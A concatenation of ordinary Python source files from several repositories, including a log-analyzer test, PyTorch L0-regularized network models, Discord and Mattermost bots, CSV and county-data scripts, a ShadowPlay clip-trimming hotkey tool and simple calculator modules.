self.assertEqual(parsed_log['total_time'], self.COUNT_LINES * self.REQUEST_TIME)
self.assertEqual(len(parsed_log['parsed_lines']), self.COUNT_LINES)
self.assertEqual(parsed_log['parsed_lines'][0]['request_time'], self.REQUEST_TIME)
def test_process_log(self):
log_fileinfo = log_analyzer.find_log(config=self.config, logger=self.logger)
parsed_log = log_analyzer.parse_log(
config=self.config,
log_fileinfo=log_fileinfo,
logger=self.logger,
)
processed_log = log_analyzer.process_log(config=self.config, parsed_log=parsed_log)
self.assertEqual(processed_log['total_count'], self.COUNT_LINES)
self.assertEqual(processed_log['total_time'], self.COUNT_LINES * self.REQUEST_TIME)
self.assertEqual(len(processed_log['data'].items()), 1)
processed_line = list(processed_log['data'].values())[0]
self.assertEqual(processed_line['time_sum'], self.COUNT_LINES * self.REQUEST_TIME)
def test_generate_report(self):
TOTAL_COUNT = 1
TIME = 5.0
PROCESSED_LINE = log_analyzer.ProcessedLine(
url='/test-url/',
count=TOTAL_COUNT,
time_sum=TIME,
time_avg=TIME,
time_max=TIME,
time_list=[TIME, TIME],
)
DATA = {'/test-url/': PROCESSED_LINE}
log_fileinfo = log_analyzer.find_log(config=self.config, logger=self.logger)
processed_log = log_analyzer.ProcessedLog(
total_count=1,
total_time=5,
data=DATA,
)
with self.assertRaises(SystemExit):
"""Check that report.html not found"""
log_analyzer.generate_report(
config=self.config,
processed_log=processed_log,
log_fileinfo=log_fileinfo,
logger=self.logger,
)
report_template_path = os.path.join(self.config['REPORT_DIR'], 'report.html')
report_template_content = '$table_json'
with open(report_template_path, 'w') as f:
f.write(report_template_content)
log_analyzer.generate_report(
config=self.config,
processed_log=processed_log,
log_fileinfo=log_fileinfo,
logger=self.logger,
)
table_json = json.dumps(
[
{
'url': PROCESSED_LINE['url'],
'count': PROCESSED_LINE['count'],
'count_perc': 100.0,
'time_sum': PROCESSED_LINE['time_sum'],
'time_perc': 100.0,
'time_avg': PROCESSED_LINE['time_avg'],
'time_max': PROCESSED_LINE['time_max'],
'time_med': TIME,
}
])
report_fileinfo = log_analyzer.generate_report_filename(
config=self.config,
log_fileinfo=log_fileinfo,
)
with open(report_fileinfo['path'], 'r') as f:
line = f.read()
self.assertEqual(line, table_json)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "1vn/L0_regularization",
"score": 2
} |
#### File: 1vn/L0_regularization/models.py
```python
import torch
import torch.nn as nn
from l0_layers import L0Conv2d, L0Dense, TDConv2d
from base_layers import MAPConv2d, MAPDense
from utils import get_flat_fts
from copy import deepcopy
import torch.nn.functional as F
class L0MLP(nn.Module):
def __init__(self, input_dim, num_classes, layer_dims=(300, 100), N=50000, beta_ema=0.999,
weight_decay=1, lambas=(1., 1., 1.), local_rep=False, temperature=2./3.):
super(L0MLP, self).__init__()
self.layer_dims = layer_dims
self.input_dim = input_dim
self.N = N
self.beta_ema = beta_ema
self.weight_decay = self.N * weight_decay
self.lambas = lambas
layers = []
for i, dimh in enumerate(self.layer_dims):
inp_dim = self.input_dim if i == 0 else self.layer_dims[i - 1]
droprate_init, lamba = 0.2 if i == 0 else 0.5, lambas[i] if len(lambas) > 1 else lambas[0]
layers += [L0Dense(inp_dim, dimh, droprate_init=droprate_init, weight_decay=self.weight_decay,
lamba=lamba, local_rep=local_rep, temperature=temperature), nn.ReLU()]
layers.append(L0Dense(self.layer_dims[-1], num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[-1], local_rep=local_rep, temperature=temperature))
self.output = nn.Sequential(*layers)
self.layers = []
for m in self.modules():
if isinstance(m, L0Dense):
self.layers.append(m)
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
def forward(self, x):
return self.output(x)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += - (1. / self.N) * layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
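# --- Hedged training-step sketch (added for illustration; not in the file) ---
# How the L0 penalty is typically combined with the data loss for the L0
# models in this file: regularization() is already scaled by the dataset size
# N inside the model, so it is simply added to the cross-entropy. `optimizer`
# and the batch tensors x, y are assumptions of this sketch.
def l0_train_step(model, x, y, optimizer):
    optimizer.zero_grad()
    loss = F.cross_entropy(model(x), y) + model.regularization()
    loss.backward()
    optimizer.step()
    if model.beta_ema > 0.:
        # keep the exponential moving average of the parameters up to date
        model.update_ema()
    return loss.item()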
class L0LeNet5(nn.Module):
def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), local_rep=False,
temperature=2./3.):
super(L0LeNet5, self).__init__()
self.N = N
assert(len(conv_dims) == 2)
self.conv_dims = conv_dims
self.fc_dims = fc_dims
self.beta_ema = beta_ema
self.weight_decay = weight_decay
convs = [L0Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[0], local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2),
L0Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[1], local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2)]
self.convs = nn.Sequential(*convs)
if torch.cuda.is_available():
self.convs = self.convs.cuda()
flat_fts = get_flat_fts(input_size, self.convs)
fcs = [L0Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[2], local_rep=local_rep, temperature=temperature), nn.ReLU(),
L0Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[3], local_rep=local_rep, temperature=temperature)]
self.fcs = nn.Sequential(*fcs)
self.layers = []
for m in self.modules():
if isinstance(m, L0Dense) or isinstance(m, L0Conv2d):
self.layers.append(m)
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
def forward(self, x):
o = self.convs(x)
o = o.view(o.size(0), -1)
return self.fcs(o)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += - (1. / self.N) * layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
class BasicBlock(nn.Module):
def __init__(self, in_planes, out_planes, stride, droprate_init=0.0, weight_decay=0., lamba=0.01, local_rep=False,
temperature=2./3.):
super(BasicBlock, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = L0Conv2d(in_planes, out_planes, kernel_size=3, stride=1, padding=1, bias=False,
droprate_init=droprate_init, weight_decay=weight_decay / (1 - 0.3), local_rep=local_rep,
lamba=lamba, temperature=temperature)
self.bn2 = nn.BatchNorm2d(out_planes)
self.conv2 = MAPConv2d(out_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False,
weight_decay=weight_decay)
self.equalInOut = (in_planes == out_planes)
self.convShortcut = (not self.equalInOut) and \
MAPConv2d(in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False,
weight_decay=weight_decay) or None
def prune(self, botk):
self.conv1.prune(botk)
def forward(self, x):
if not self.equalInOut:
x = F.relu(self.bn1(x))
else:
out = F.relu(self.bn1(x))
out = self.conv1(out if self.equalInOut else x)
out = self.conv2(F.relu(self.bn2(out)))
return torch.add(out, x if self.equalInOut else self.convShortcut(x))
class NetworkBlock(nn.Module):
def __init__(self, nb_layers, in_planes, out_planes, block, stride, droprate_init=0.0, weight_decay=0., lamba=0.01,
local_rep=False, temperature=2./3.):
super(NetworkBlock, self).__init__()
self.layer = self._make_layer(block, in_planes, out_planes, nb_layers, stride, droprate_init,
weight_decay=weight_decay, lamba=lamba, local_rep=local_rep,
temperature=temperature)
def _make_layer(self, block, in_planes, out_planes, nb_layers, stride, droprate_init,
weight_decay=0., lamba=0.01, local_rep=False, temperature=2./3.):
layers = []
for i in range(nb_layers):
            layers.append(block(i == 0 and in_planes or out_planes, out_planes, i == 0 and stride or 1,
                                droprate_init, weight_decay, lamba=lamba, local_rep=local_rep,
                                temperature=temperature))
return nn.Sequential(*layers)
def forward(self, x):
return self.layer(x)
def prune(self, botk):
new_layers = []
for layer in self.layer:
layer.prune(botk)
new_layers.append(layer)
self.layer = nn.Sequential(*new_layers)
class TDNetworkBlock(nn.Module):
def __init__(self, nb_layers, in_planes, out_planes, block, stride, droprate_init=0.0, weight_decay=0., lamba=0.01,
local_rep=False, temperature=2./3., dropout=0.5, dropout_botk=0.5, dropout_type="weight"):
super(TDNetworkBlock, self).__init__()
self.layer = self._make_layer(block, in_planes, out_planes, nb_layers, stride, droprate_init,
weight_decay=weight_decay, lamba=lamba, local_rep=local_rep,
temperature=temperature, dropout=dropout, dropout_botk=dropout_botk, dropout_type=dropout_type)
def _make_layer(self, block, in_planes, out_planes, nb_layers, stride, droprate_init,
weight_decay=0., lamba=0.01, local_rep=False, temperature=2./3., dropout=0.5, dropout_botk=0.5, dropout_type="weight"):
layers = []
for i in range(nb_layers):
            layers.append(block(i == 0 and in_planes or out_planes, out_planes, i == 0 and stride or 1,
                                droprate_init, weight_decay, lamba=lamba, local_rep=local_rep, temperature=temperature,
                                dropout=dropout, dropout_botk=dropout_botk, dropout_type=dropout_type))
return nn.Sequential(*layers)
def forward(self, x):
return self.layer(x)
def prune(self, botk):
new_layers = []
for layer in self.layer:
layer.prune(botk)
new_layers.append(layer)
self.layer = nn.Sequential(*new_layers)
class L0WideResNet(nn.Module):
def __init__(self, depth, num_classes, widen_factor=1, droprate_init=0.3, N=50000, beta_ema=0.99,
weight_decay=5e-4, local_rep=False, lamba=0.01, temperature=2./3.):
super(L0WideResNet, self).__init__()
nChannels = [16, 16*widen_factor, 32*widen_factor, 64*widen_factor]
assert((depth - 4) % 6 == 0)
self.n = (depth - 4) // 6
self.N = N
self.beta_ema = beta_ema
block = BasicBlock
self.weight_decay = N * weight_decay
self.lamba = lamba
# 1st conv before any network block
self.conv1 = MAPConv2d(3, nChannels[0], kernel_size=3, stride=1, padding=1, bias=False,
weight_decay=self.weight_decay)
# 1st block
self.block1 = NetworkBlock(self.n, nChannels[0], nChannels[1], block, 1, droprate_init, self.weight_decay,
self.lamba, local_rep=local_rep, temperature=temperature)
# 2nd block
self.block2 = NetworkBlock(self.n, nChannels[1], nChannels[2], block, 2, droprate_init, self.weight_decay,
self.lamba, local_rep=local_rep, temperature=temperature)
# 3rd block
self.block3 = NetworkBlock(self.n, nChannels[2], nChannels[3], block, 2, droprate_init, self.weight_decay,
self.lamba, local_rep=local_rep, temperature=temperature)
# bn, relu and classifier
self.bn = nn.BatchNorm2d(nChannels[3])
self.fcout = MAPDense(nChannels[3], num_classes, weight_decay=self.weight_decay)
self.layers, self.bn_params = [], []
for m in self.modules():
if isinstance(m, MAPDense) or isinstance(m, MAPConv2d) or isinstance(m, L0Conv2d):
self.layers.append(m)
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
self.bn_params += [m.weight, m.bias]
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
print('Using weight decay: {}'.format(self.weight_decay))
def forward(self, x):
out = self.conv1(x)
out = self.block1(out)
out = self.block2(out)
out = self.block3(out)
out = F.relu(self.bn(out))
out = F.avg_pool2d(out, 8)
out = out.view(out.size(0), -1)
return self.fcout(out)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += - (1. / self.N) * layer.regularization()
for bnw in self.bn_params:
if self.weight_decay > 0:
regularization += (self.weight_decay / self.N) * .5 * torch.sum(bnw.pow(2))
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def prune(self, botk):
self.block1.prune(botk)
self.block2.prune(botk)
self.block3.prune(botk)
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
try:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
except:
pass
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
class TDBasicBlock(nn.Module):
def __init__(self, in_planes, out_planes, stride, droprate_init=0.0, weight_decay=0., lamba=0.01, local_rep=False,
temperature=2./3., dropout=0.5, dropout_botk=0.5, dropout_type="weight"):
super(TDBasicBlock, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes, eps=0.001, momentum=0.997)
self.conv1 = TDConv2d(in_planes, out_planes, kernel_size=3, stride=1, padding=1, bias=False,
droprate_init=droprate_init, weight_decay=weight_decay / (1 - 0.3), local_rep=local_rep,
lamba=lamba, temperature=temperature, dropout=dropout, dropout_botk=dropout_botk, dropout_type=dropout_type)
self.bn2 = nn.BatchNorm2d(out_planes, eps=0.001, momentum=0.997)
self.conv2 = MAPConv2d(out_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False,
weight_decay=weight_decay)
self.equalInOut = (in_planes == out_planes)
self.convShortcut = (not self.equalInOut) and \
MAPConv2d(in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False,
weight_decay=weight_decay) or None
def prune(self, botk):
self.conv1.prune(botk)
def forward(self, x):
# print("block pre relu: ", x)
if not self.equalInOut:
x = self.bn1(x)
# print("x_bn:", x)
x = F.relu(x)
# print("x_relu:", x)
else:
out = self.bn1(x)
# print("out_bn:", out)
out = F.relu(out)
# print("out_relu:", out)
# print("block conv1 in: ", out if self.equalInOut else x)
out = self.conv1(out if self.equalInOut else x)
# print("block conv1 out: ", out)
out = self.conv2(F.relu(self.bn2(out)))
# print("block conv2 out: ", out)
return torch.add(out, x if self.equalInOut else self.convShortcut(x))
class TDWideResNet(nn.Module):
def __init__(self, depth, num_classes, widen_factor=1, droprate_init=0.3, N=50000, beta_ema=0.99,
weight_decay=5e-4, local_rep=False, lamba=0.01, temperature=2./3., dropout=0.5, dropout_botk=0.5, dropout_type="weight"):
super(TDWideResNet, self).__init__()
nChannels = [16, 16*widen_factor, 32*widen_factor, 64*widen_factor]
assert((depth - 4) % 6 == 0)
self.n = (depth - 4) // 6
self.N = N
self.beta_ema = beta_ema
block = TDBasicBlock
self.weight_decay = 0.001
self.lamba = lamba
# 1st conv before any network block
self.conv1 = MAPConv2d(3, nChannels[0], kernel_size=3, stride=1, padding=1, bias=False,
weight_decay=self.weight_decay)
# 1st block
self.block1 = TDNetworkBlock(self.n, nChannels[0], nChannels[1], block, 1, droprate_init, self.weight_decay,
self.lamba, local_rep=local_rep, temperature=temperature, dropout=dropout, dropout_botk=dropout_botk, dropout_type=dropout_type)
# 2nd block
self.block2 = TDNetworkBlock(self.n, nChannels[1], nChannels[2], block, 2, droprate_init, self.weight_decay,
self.lamba, local_rep=local_rep, temperature=temperature, dropout=dropout, dropout_botk=dropout_botk, dropout_type=dropout_type)
# 3rd block
self.block3 = TDNetworkBlock(self.n, nChannels[2], nChannels[3], block, 2, droprate_init, self.weight_decay,
self.lamba, local_rep=local_rep, temperature=temperature, dropout=dropout, dropout_botk=dropout_botk, dropout_type=dropout_type)
# bn, relu and classifier
self.bn = nn.BatchNorm2d(nChannels[3])
self.fcout = MAPDense(nChannels[3], num_classes, weight_decay=self.weight_decay)
self.layers, self.bn_params = [], []
for m in self.modules():
if isinstance(m, MAPDense) or isinstance(m, MAPConv2d) or isinstance(m, L0Conv2d):
self.layers.append(m)
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
self.bn_params += [m.weight, m.bias]
print('Using weight decay: {}'.format(self.weight_decay))
def forward(self, x):
out = self.conv1(x)
#print("covn1 out:", out)
out = self.block1(out)
#print("block1 out:", out)
out = self.block2(out)
#print("block2 out:", out)
out = self.block3(out)
#print("block3 out:", out)
out = F.relu(self.bn(out))
#print("relu out:", out)
out = F.avg_pool2d(out, 8)
#print("pooling:", out)
out = out.view(out.size(0), -1)
#print("resnet forward out:", out)
return self.fcout(out)
def prune(self, botk):
self.block1.prune(botk)
self.block2.prune(botk)
self.block3.prune(botk)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
try:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
            except Exception:
                # this layer does not implement count_expected_flops_and_l0(); skip it
                pass
return expected_flops, expected_l0
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
``` |
{
"source": "1VORK/idat",
"score": 2
} |
#### File: 1VORK/idat/idat.py
```python
import discord
from discord.utils import get
client=discord.Client(intents=discord.Intents.all())
@client.event
async def on_message(m):
if m.author.id == 159985870458322944 and m.channel.id == 617560772368924673 and len(m.content) > 15:
mem = m.mentions[0]
lvl = int(m.content.split()[18])
if lvl > 99:
await mem.add_roles(get(m.guild.roles, id=0)) #ant
elif lvl > 89:
await mem.add_roles(get(m.guild.roles, id=772193415802388500)) #outside
elif lvl > 79:
await mem.add_roles(get(m.guild.roles, id=772192532401750017)) #spoon
elif lvl > 69:
await mem.add_roles(get(m.guild.roles, id=609437506714206215)) #crocs
elif lvl > 59:
await mem.add_roles(get(m.guild.roles, id=617923744811319317)) #crayf
elif lvl > 49:
await mem.add_roles(get(m.guild.roles, id=617923740117762088)) #manc
elif lvl > 39:
await mem.add_roles(get(m.guild.roles, id=609459315916406847)) #bee
elif lvl > 29:
await mem.add_roles(get(m.guild.roles, id=617923748737187858)) #crab
elif lvl > 19:
await mem.add_roles(get(m.guild.roles, id=531217764145430528)) #hyd
elif lvl > 9:
await mem.add_roles(get(m.guild.roles, id=617654956845170701)) #mag
elif lvl > 4:
await mem.add_roles(get(m.guild.roles, id=531214594480406548)) #frog
client.run(open('tokens/idat','r').read())
``` |
{
"source": "1wheel/learning",
"score": 3
} |
#### File: stacktest/0/readCSV.py
```python
import csv
from datetime import datetime
from dateutil.relativedelta import relativedelta
# loads a csv file into a list of row dictionaries
def parseCSV(fileName):
with open(fileName, 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='"')
columnTitles = reader.next()
data = []
for r in reader:
nextRow = {}
for i in range(0,len(columnTitles)):
varName = str(columnTitles[i])
nextRow[varName] = r[i]
data.append(nextRow)
print 'read ' + fileName
return data
emmiArray = parseCSV('AllClients_ResearchData.csv')
emmiDateFields = {'DATE_ISSUED': 'eIssued', 'eStarted_DT': 'eStarted'}
keyFields = ['ORGANIZATION_NM', 'FIRST_NM', 'LAST_NM', 'DOB']
invalidStartDate = datetime.strptime('5/7/4013', "%m/%d/%Y")
emmiObject = {}
for row in emmiArray:
if row['FIRST_NM'] != 'UNKNOWN':
row['eIssued'] = datetime.strptime(row['DATE_ISSUED'], "%m/%d/%Y")
row['eViewBy'] = datetime.strptime(row['VIEW_BY_DT'], "%m/%d/%Y") + relativedelta(days=3, months=1)
try:
row['eStarted'] = datetime.strptime(row['DATE_STARTED'], "%m/%d/%Y")
except Exception:
row['eStarted'] = invalidStartDate
key = ''
for field in keyFields:
key = key + row[field]
if key not in emmiObject:
emmiObject[key] = []
emmiObject[key].append(row)
pArray = []
for key in emmiObject:
pArray.append(emmiObject[key])
#hist(map(lambda d: len(d), filter(lambda d: len(d) < 15, pArray)), bins=14)
unoStartDate = datetime.strptime('6/23/2013', "%m/%d/%Y")
gridSize = 10
preUno = []
postUno = []
for i in range(gridSize):
nextPreRow = []
nextPostRow = []
for j in range(gridSize):
nextPreRow.append(0)
nextPostRow.append(0)
preUno.append(nextPreRow)
postUno.append(nextPostRow)
excludedSizeStarts = 0
excludedDateStarts = 0
viewable = 0
viewed = 0
for accessCode in patientRecord:
    if (accessCode['eStarted'] >= viewingDay
            and accessCode['eViewBy'] >= viewingDay
            and accessCode['eIssued'] <= viewingDay):
        viewable = viewable + 1
        if accessCode['eStarted'] == viewingDay:
            viewed = viewed + 1
for p in pArray:
    viewDays = set(map(lambda d: d['eStarted'], p)).difference(set([invalidStartDate]))
    for viewDay in viewDays:
        viewable = 0
        viewed = 0
        for accessCode in p:
            if (accessCode['eStarted'] >= viewDay
                    and accessCode['eViewBy'] >= viewDay
                    and accessCode['eIssued'] <= viewDay):
                viewable = viewable + 1
                if accessCode['eStarted'] == viewDay:
                    viewed = viewed + 1
        if viewable < viewed:
            excludedDateStarts = excludedDateStarts + viewed
        elif gridSize <= viewable:
            excludedSizeStarts = excludedSizeStarts + viewed
        else:
            if viewDay < unoStartDate:
                preUno[viewable][viewed] = preUno[viewable][viewed] + 1
            else:
                postUno[viewable][viewed] = postUno[viewable][viewed] + 1
``` |
{
"source": "1wheel/whitehouse-petitions",
"score": 3
} |
#### File: 1wheel/whitehouse-petitions/formatUS.py
```python
import json
f = open('US.txt')
lines = f.readlines()
countyArray = []
for l in lines:
l = l.split('\t')
countyArray.append({'name': l[2], 'state': l[4], 'countyName': l[5], 'countyCode': l[6]})
f = open('population.txt')
countyPop = {}
lines = f.readlines()
for l in lines:
l = l.split(',')
countyPop[l[0]] = l[1]
stateCodes = {
'WA': '53', 'DE': '10', 'DC': '11', 'WI': '55', 'WV': '54', 'HI': '15',
'FL': '12', 'WY': '56', 'PR': '72', 'NJ': '34', 'NM': '35', 'TX': '48',
'LA': '22', 'NC': '37', 'ND': '38', 'NE': '31', 'TN': '47', 'NY': '36',
'PA': '42', 'AK': '02', 'NV': '32', 'NH': '33', 'VA': '51', 'CO': '08',
'CA': '06', 'AL': '01', 'AR': '05', 'VT': '50', 'IL': '17', 'GA': '13',
'IN': '18', 'IA': '19', 'MA': '25', 'AZ': '04', 'ID': '16', 'CT': '09',
'ME': '23', 'MD': '24', 'OK': '40', 'OH': '39', 'UT': '49', 'MO': '29',
'MN': '27', 'MI': '26', 'RI': '44', 'KS': '20', 'MT': '30', 'MS': '28',
'SC': '45', 'KY': '21', 'OR': '41', 'SD': '46'
}
cityByState = {}
countyCodes = {}
for state in stateCodes:
cityByState[state] = {}
for city in countyArray:
try:
countyCode = stateCodes[city['state']] + city['countyCode']
if city['countyCode'] != '':
countyCodes[countyCode] = city['countyName']
if city['name'] in cityByState[city['state']]:
if not countyCode in cityByState[city['state']][city['name']]:
cityByState[city['state']][city['name']].append(countyCode)
else:
cityByState[city['state']][city['name']] = [countyCode]
    # city doesn't have a county code
    except Exception:
        pass
def findCountyCode(city, state):
try:
return cityByState[state][city][0]
except Exception:
#print city + ", " + state
return -1
f = open('2008PresByCounty.csv')
countyPres = {}
lines = f.readlines()
for l in lines:
l = l.replace('\"','').split(',')
try:
countyPres[l[0]] = float(l[1])/(float(l[1])+float(l[2]))
except Exception:
print l
json.dump(countyPop, open('countyPop.json', 'wb'))
#data = json.load(open(filename))
``` |
{
"source": "1WHISKY/shadowplay-multilenght-clips",
"score": 2
} |
#### File: 1WHISKY/shadowplay-multilenght-clips/shadowplay_hotkeys.py
```python
from pynput import keyboard
import os
import time
import glob
import subprocess
import json
import threading
videos_path = os.environ["USERPROFILE"] + "\\Videos\\" #Adjust to wherever you store your videos
videos_path = videos_path.replace("C:\\","D:\\") #I have mine on the D drive
log_path = "hotkeys_log.txt"
kb = keyboard.Controller()
log_ffmpeg = True
def log(text):
with open(log_path, "a") as file:
file.write(text + "\n")
def save_highlight(dur = 90):
try:
for filename in glob.iglob(videos_path + '**/*.mp4', recursive=True):
if ((time.time() - os.stat(filename).st_ctime) / 60) > 1:
continue
#https://stackoverflow.com/questions/3844430/how-to-get-the-duration-of-a-video-in-python
result = subprocess.check_output(f'ffprobe -v quiet -show_streams -select_streams v:0 -of json "{filename}"',shell=True).decode()
duration = json.loads(result)['streams'][0]['duration']
if float(duration) < 120: #Dont touch videos which are already shorter than 120s, adjust this if you want longer clips
continue
log("Trimming to " + str(dur) + "s: " + filename)
tempname = filename + "_temp.mp4"
os.system("ffmpeg" + ("" if log_ffmpeg else " -loglevel quiet") + " -hide_banner -sseof -" + str(dur) + " -i \"" + filename + "\" -map 0:v -map 0:a -c copy \"" + tempname + "\" >> \"" + log_path + "\" 2>&1")
log("Deleting original: " + filename)
os.remove(filename)
os.rename(tempname, filename)
log("Trimmed " + filename)
except Exception as e:
log(e)
def save_highlight90():
    kb.press(keyboard.Key.f10) #My shortcut to save shadowplay clips is alt+f10 (default), so adjust accordingly
kb.release(keyboard.Key.f10) #The user is already holding alt, so no need to press/release it here
log('Hotkey pressed, waiting 40s')
t = threading.Timer(40.0, save_highlight,[90]) #Make sure your drive is fast enough to store the full video in 40s
t.start() #Using time.sleep in a function called by keyboard.GlobalHotKeys causes issues, thats why a new thread will be created
def save_highlight30():
kb.press(keyboard.Key.f10)
kb.release(keyboard.Key.f10)
log('Hotkey pressed, waiting 40s')
t = threading.Timer(40.0, save_highlight,[30])
t.start()
with keyboard.GlobalHotKeys({
'<alt>+<f11>': save_highlight90, #These shortcuts are used by shadowplay by default for something, so make sure to unbind those in the settings
'<alt>+<f12>': save_highlight30}) as h:
h.join()
``` |
{
"source": "1wickes/wickes-tools",
"score": 4
} |
#### File: wickes_tools/cal1/cal2.py
```python
class cal:
def __init__(self, num1, num2):
self.num1 = num1
self.num2 = num2
def add_numbers(self):
return self.num1 + self.num2
@staticmethod
def subtract_numbers(num1, num2):
return num1 - num2
@staticmethod
def multiply_numbers(num1, num2):
return num1 * num2
@staticmethod
def divide_numbers(num1, num2):
return num1 / num2
def main():
print("calculator module")
if __name__ == "__main__":
main()
```
#### File: wickes_tools/cal4/cal5.py
```python
def main():
print('main function from cal3.py module in package calculator2')
if __name__ == '__main__':
print('this is cal3.py')
``` |
{
"source": "1wilkens/mattermost-exercises",
"score": 3
} |
#### File: mattermost-exercises/movement_bot/subscription_bot.py
```python
import asyncio
import itertools
import json
import re
import threading
from mattermostdriver import Driver
class SubscriptionBot:
""" A mattermost bot implementing a publish/subscribe mechanism. """
SUBSCRIBED_MESSAGE = "Hi there - thx for joining!"
UNSUBSCRIBED_MESSAGE = "Bye then, couch potato!"
NOT_SUBSCRIBED_MESSAGE = "Are you also trying to cancel your gym membership before even registering?"
UNKNOWN_COMMAND_TEXT = "I don't get it, want to join? Try 'subscribe' instead. 'help' may also be your friend."
HELP_TEXT = """
|Command|Description|
|:------|:----------|
|subscribe|Join the growing list of subscribers now!|
|unsubscribe|Go back to your boring office-chair-only life.|
|help|I'm quite sure, you know what this one does.|
"""
def __init__(self, username, password, scheme='https', debug=False):
self.subscriptions = set()
self.username = username
self.debug = debug
self.driver = Driver({
'url': "192.168.122.254",
'login_id': username,
'password': password,
'scheme': scheme,
'debug': debug,
})
self.driver.login()
# get userid for username since it is not automatically set to driver.client.userid ... for reasons
res = self.driver.users.get_user_by_username('bot')
self.userid = res['id']
def start_listening(self):
worker = threading.Thread(target=SubscriptionBot._start_listening_in_thread, args=(self,))
worker.daemon = True
worker.start()
print("Initialized bot.")
def _start_listening_in_thread(self):
# Setting event loop for thread
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
self.driver.init_websocket(self.websocket_handler)
@asyncio.coroutine
def websocket_handler(self, event_json):
event = json.loads(event_json)
if self.debug:
print("websocket_handler:" + json.dumps(event, indent=4))
if 'event' in event and event['event'] == 'posted':
# mentions is automatically set in direct messages
mentions = json.loads(event['data']['mentions']) if 'mentions' in event['data'] else []
post = json.loads(event['data']['post'])
post_id = post['id']
message = post['message']
channel_id = post['channel_id']
sender_id = post['user_id']
if self.userid in mentions:
self.handle_bot_message(channel_id, post_id, sender_id, message)
def handle_bot_message(self, channel_id, post_id, sender_id, message):
        if re.match(r'(@' + self.username + r')?\s*help\s*', message):
